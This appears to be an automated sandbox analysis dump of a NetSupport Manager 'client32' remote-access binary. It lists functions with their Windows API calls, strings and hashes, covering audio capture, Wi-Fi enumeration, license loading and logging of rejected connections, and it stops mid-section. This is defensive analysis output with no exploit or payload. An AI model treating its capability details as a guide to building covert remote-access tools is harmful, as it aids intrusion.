m_hWnd, xrefs: 11039430, 110394E6, 1103951B, 11039556
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1103942B
m_nc, xrefs: 11039475
CLTCONN.CPP, xrefs: 11039470

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
API String ID: 4191401721-1182766118
Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759

Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 11003691

Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111

CreateSolidBrush.GDI32(00000000), ref: 110036A5
GetStockObject.GDI32(00000007), ref: 110036B0
SelectObject.GDI32(?,00000000), ref: 110036BB
SelectObject.GDI32(?,?), ref: 110036CC
GetSysColor.USER32(00000010), ref: 110036DC
GetSysColor.USER32(00000010), ref: 110036F3
GetSysColor.USER32(00000014), ref: 1100370A
GetSysColor.USER32(00000014), ref: 11003721
GetSysColor.USER32(00000014), ref: 1100373E
GetSysColor.USER32(00000014), ref: 11003755
GetSysColor.USER32(00000010), ref: 1100376C
GetSysColor.USER32(00000010), ref: 11003783
InflateRect.USER32 ref: 110037A0
Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
SelectObject.GDI32(?,?), ref: 110037CE
SelectObject.GDI32(?,?), ref: 110037D8
DeleteObject.GDI32(?), ref: 110037DE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
String ID:
API String ID: 3698065672-0
Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1

Function 1104B7F0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 229timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,B24479DC,?,?), ref: 1104B8F6
_sprintf.LIBCMT ref: 1104B923

Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003), ref: 110EDA19

_strncpy.LIBCMT ref: 1104BACE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1104B9A0, 1104B9E4
NC-, xrefs: 1104BAC4
%s, %d, xrefs: 1104B869
%04d/%02d/%02d %02d:%02d:%02d, xrefs: 1104B91D
IsA(), xrefs: 1104B9A5, 1104B9E9
Info. Connection Rejected, reason=%d, xrefs: 1104B83C
*** Warning. Failed Attack %u, from %s, at %s, xrefs: 1104BA02
Software\Productive Computer Insight\Client32, xrefs: 1104B8B3
@ %s, xrefs: 1104B979
LastAttack, xrefs: 1104B931
LastAttacker, xrefs: 1104B9BB
FailedAttacks, xrefs: 1104B8CE, 1104B8E2

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 3341947355-3231647555
Opcode ID: bf24cdc0d1c8f437c1f78f848f572163a498503435f86e354c973d25993fb003
Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
Opcode Fuzzy Hash: bf24cdc0d1c8f437c1f78f848f572163a498503435f86e354c973d25993fb003
Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61

Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1104702F
wsprintfA.USER32 ref: 110470AE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

wsprintfA.USER32 ref: 110470E9
GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
_strrchr.LIBCMT ref: 1104720C
GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
_free.LIBCMT ref: 11047251

Strings

V12.10, xrefs: 110470D9, 110470DE
V12.00, xrefs: 110470D2
NSS, xrefs: 1104708E
V12.10F20, xrefs: 110470FA, 110471A5
CLTCONN.CPP, xrefs: 11047042
NSA %s, xrefs: 110470A8
%s %s, xrefs: 110470BA, 110470E0
V1.10, xrefs: 1104709C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
API String ID: 1757445300-1785190265
Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2

Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

_malloc.LIBCMT ref: 1100B496

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,B24479DC,?,00000000,00000000), ref: 1100AD54
Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45

EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,B24479DC,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B4E8
_calloc.LIBCMT ref: 1100B519
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E

Strings

Vista new pAudioCap=%p, xrefs: 1100B603
Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
\\.\NSAudioFilter, xrefs: 1100B4E0
Audio, xrefs: 1100B477
DisableSounds, xrefs: 1100B472
InitCaptureSounds NT6, xrefs: 1100B5BE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 1843377891-2362500394
Opcode ID: d54540c7e3060f6c2cac778f33b6634bb13fd55eb5ecd4e5e988a912719bd391
Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
Opcode Fuzzy Hash: d54540c7e3060f6c2cac778f33b6634bb13fd55eb5ecd4e5e988a912719bd391
Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1

Function 1102B920 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetLastError.KERNEL32(?), ref: 1102BA81
GetLastError.KERNEL32(?), ref: 1102BADE
_fgets.LIBCMT ref: 1102BB10
_strtok.LIBCMT ref: 1102BB38

Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4

_fgets.LIBCMT ref: 1102BB74
_strtok.LIBCMT ref: 1102BB88

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102B9D1, 1102BAAE
WARN: Could not open TS lookup file: "%s" (%d), user="%s", xrefs: 1102BAF1
WARN: No TS lookup file specified!, xrefs: 1102B9ED
IsA(), xrefs: 1102B9D6, 1102BAB3
*LookupFile, xrefs: 1102B9A8
WARN: clientname is empty!, xrefs: 1102BBE8
LookupFileUser, xrefs: 1102BA4A
WARN: LoginUser failed (%d) user="%s", xrefs: 1102BA88

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 78526175-1484737611
Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91

Function 11027B20 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 174windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BB0
LoadIconA.USER32(00000000,00007D0B,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BC5
GetSystemMetrics.USER32(00000032,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BDE
GetSystemMetrics.USER32(00000031,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BE3
LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027BF3
LoadIconA.USER32(11000000,00000491,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027C0B
GetSystemMetrics.USER32(00000032,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027C1A
GetSystemMetrics.USER32(00000031,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027C1F
LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027C30

Strings

_License, xrefs: 11027B5D
PCIRES, xrefs: 11027BAB
AdminUserAcknowledge, xrefs: 11027C8B
NSM.LIC, xrefs: 11027B31
product, xrefs: 11027B58

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
API String ID: 1946015-4092316048
Opcode ID: b02a9135468864f94d42cdd8a8e1631fe42df336639f4756734e631bac92024b
Instruction ID: b61cf272041b3986789d5db62e37e05cd74fdd835a4c3c17a37838dc7586d827
Opcode Fuzzy Hash: b02a9135468864f94d42cdd8a8e1631fe42df336639f4756734e631bac92024b
Instruction Fuzzy Hash: 4D51D8B5F4061A6BE711CBB08D81F6FB6ACAF54758F500469FA05E7680EB70E900C7A2

Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

LoadLibraryA.KERNEL32(wlanapi.dll), ref: 1115B61B
GetProcAddress.KERNEL32(00000000,WlanOpenHandle,?,?,?,11058627), ref: 1115B634
GetProcAddress.KERNEL32(?,WlanCloseHandle,?,?,?,11058627), ref: 1115B644
GetProcAddress.KERNEL32(?,WlanEnumInterfaces,?,?,?,11058627), ref: 1115B654
GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList,?,?,?,11058627), ref: 1115B664
GetProcAddress.KERNEL32(?,WlanFreeMemory,?,?,?,11058627), ref: 1115B674
std::exception::exception.LIBCMT ref: 1115B68D
__CxxThrowException@8.LIBCMT ref: 1115B6A2

Strings

wlanapi.dll, xrefs: 1115B613
WlanGetAvailableNetworkList, xrefs: 1115B65E
WlanCloseHandle, xrefs: 1115B63E
WlanOpenHandle, xrefs: 1115B62E
WlanFreeMemory, xrefs: 1115B66E
WlanEnumInterfaces, xrefs: 1115B64E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
API String ID: 2439742961-1736626566
Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95

Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516

_free.LIBCMT ref: 1112131D

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 11121333
_free.LIBCMT ref: 11121348
GdiFlush.GDI32 ref: 11121350
_free.LIBCMT ref: 1112135D
_free.LIBCMT ref: 11121371
SelectObject.GDI32(?,?), ref: 1112138D
DeleteObject.GDI32(?), ref: 1112139A
GetLastError.KERNEL32(?,?,?,?,?,00348B30), ref: 111213A4
DeleteDC.GDI32(?), ref: 111213CB
ReleaseDC.USER32(?,?), ref: 111213DE
DeleteDC.GDI32(?), ref: 111213EB
InterlockedDecrement.KERNEL32(111EA9C8,?,?,?,?,?,00348B30), ref: 111213F8

Strings

Error deleting membm, e=%d, xrefs: 111213AB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
